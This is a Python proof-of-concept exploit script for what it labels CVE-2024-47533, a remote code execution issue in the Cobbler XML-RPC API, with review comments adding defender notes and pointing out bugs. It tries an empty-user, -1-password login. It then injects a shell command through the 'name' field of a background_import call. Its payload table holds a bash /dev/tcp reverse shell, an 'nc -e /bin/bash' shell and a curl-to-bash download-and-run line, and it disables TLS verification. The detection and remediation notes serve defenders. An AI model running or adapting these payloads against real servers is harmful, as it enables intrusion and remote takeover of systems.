#!/usr/bin/env python3
import ssl
import xmlrpc.client
import argparse
def exploit(target: str, lhost: str, lport: int, payload_type: str | None) -> bool:
    """Send one crafted ``background_import`` XML-RPC call to a Cobbler API endpoint.

    Proof-of-concept flow for the issue this script labels CVE-2024-47533:

    1. Build a shell command string from ``lhost``/``lport``.
    2. Open an XML-RPC proxy to ``target`` with TLS verification disabled.
    3. Call ``login("", -1)`` and keep whatever token comes back.
    4. Call ``background_import`` with an options dict whose ``name`` value is
       the command string wrapped in ``$(...)``.

    Defender view: on the server this shows up as a ``login`` call carrying an
    empty user name and the integer ``-1`` as the password, followed by a
    ``background_import`` call whose ``name`` option contains shell
    metacharacters (``$(``). Both are reasonable things to alert on in
    XML-RPC request logging. Remediation is the vendor fix for the CVE plus
    keeping the API port unreachable from untrusted networks; fixed versions
    are not stated on this page, so take them from the vendor advisory.

    Args:
        target: URL handed to ``xmlrpc.client.ServerProxy``.
        lhost: Host interpolated into the command strings.
        lport: Port interpolated into the command strings.
        payload_type: Key into the local ``payloads`` table
            (``"bash"``, ``"nc"`` or ``"curl"``).

    Returns:
        True when ``background_import`` returned without raising, False when
        any exception reached the outer handler. True only means the request
        was accepted by the transport; the response is never inspected, so it
        says nothing about whether a command ran on the server.
    """
    payloads = {
        "bash": f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'",
        "nc": f"nc -e /bin/bash {lhost} {lport}",
        # This entry ignores lport and fetches over plain HTTP from lhost.
        "curl": f"curl http://{lhost}/rev.sh | bash"
    }
    # NOTE(review): the fallback is the whole dict, not one entry. When
    # payload_type is None or unknown, the f-string below interpolates the
    # dict's repr, so the ``name`` field carries all three strings at once.
    payload = payloads.get(payload_type, payloads)
    print(f"[*] Target: {target}")
    print(f"[*] Listener: {lhost}:{lport}")
    print(f"[*] Payload type: {payload_type}")
    try:
        conn = xmlrpc.client.ServerProxy(
            target,
            # Private ssl helper: no certificate or hostname verification, so
            # the client accepts any TLS peer, including an interceptor.
            context=ssl._create_unverified_context(),
            allow_none=True
        )
        print("[*] Trying to authenticate...")
        try:
            # Empty user name with the integer -1 as password; presumably the
            # authentication weakness the CVE refers to (confirm against the
            # advisory). A patched server is expected to reject this call.
            token = conn.login("", -1)
            print("[+] Login success!")
        except:
            # Bare except: any failure (refused login, network error, even
            # KeyboardInterrupt) lands here. The message is misleading, since
            # this branch means login did NOT succeed; the script then falls
            # back to calling the API without a token.
            token = None
            print("[-] Login bypass (anonymous)")
        import_data = {
            "path": "~/tmp",
            # ``$(...)`` is shell command substitution; it only has an effect
            # if the server passes this value to a shell unsanitised.
            "name": f"$({payload})"
        }
        print("[*] Sending exploit...")
        if token:
            result = conn.background_import(import_data, token)
        else:
            result = conn.background_import(import_data)
        # ``result`` is never read; the success message is unconditional.
        print("[+] Exploit sent. Check your listener (nc -lvnp PORT)")
        return True
    except Exception as e:
        # Covers connection errors and XML-RPC faults raised by the server.
        print(f"[-] Exploit failed: {e}")
        return False
def main():
    """Read the command-line options and pass them straight to ``exploit``.

    ``--payload`` is optional and has no default, so ``exploit`` receives
    ``None`` for the payload type when the flag is omitted.
    """
    cli = argparse.ArgumentParser(description="CVE-2024-47533 - Cobbler RCE")

    # (flags, keyword settings) for each option, registered in this order.
    option_specs = (
        (('-t', '--target'),
         {'required': True,
          'help': 'Target URL (e.g., https://127.0.0.1:25151/cobbler_api)'}),
        (('-l', '--lhost'),
         {'required': True, 'help': 'Your IP for reverse shell'}),
        (('-p', '--lport'),
         {'required': True, 'type': int, 'help': 'Your port for reverse shell'}),
        (('--payload',),
         {'choices': ['bash', 'nc', 'curl'], 'help': 'Payload type'}),
    )
    for flags, settings in option_specs:
        cli.add_argument(*flags, **settings)

    opts = cli.parse_args()
    exploit(opts.target, opts.lhost, opts.lport, opts.payload)
# Run the command-line entry point only when executed as a script, so that
# importing this module has no side effects.
if __name__ == "__main__":
    main()